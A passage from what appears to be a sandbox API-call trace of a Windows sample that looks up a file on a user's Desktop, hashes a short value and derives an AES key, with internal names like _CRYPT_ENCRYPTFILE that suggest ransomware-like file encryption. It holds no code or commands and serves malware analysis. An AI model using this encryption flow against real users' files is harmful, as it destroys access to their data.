cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bqaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qaC0v.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0164.391] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0164.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0164.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.391] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0164.391] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0164.391] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0164.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0164.392] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0164.392] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0164.392] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0164.392] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.392] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0164.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0164.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0164.393] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x8e9e2530, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 0x90ae18 [0164.393] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0164.393] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.393] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.393] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.393] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.393] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.394] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0164.394] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.394] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0164.394] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.394] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.394] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0164.394] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.395] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0164.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.395] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0164.396] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0164.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0164.397] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0164.397] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.397] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.397] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.397] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0164.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0164.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.398] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.398] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0164.398] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0164.398] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.398] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.398] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.398] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.398] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0164.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0164.398] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.398] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.399] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.399] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0164.399] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.399] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0164.399] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0164.399] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0164.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0164.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.399] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.399] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.399] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.399] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0164.399] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.399] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.400] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.400] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.400] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.400] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.400] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.400] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.401] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.401] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.401] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0164.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.401] CryptDestroyHash (hHash=0x90af58) returned 1 [0164.401] PeekMessageW (in: lpMsg=0x87ee3c, 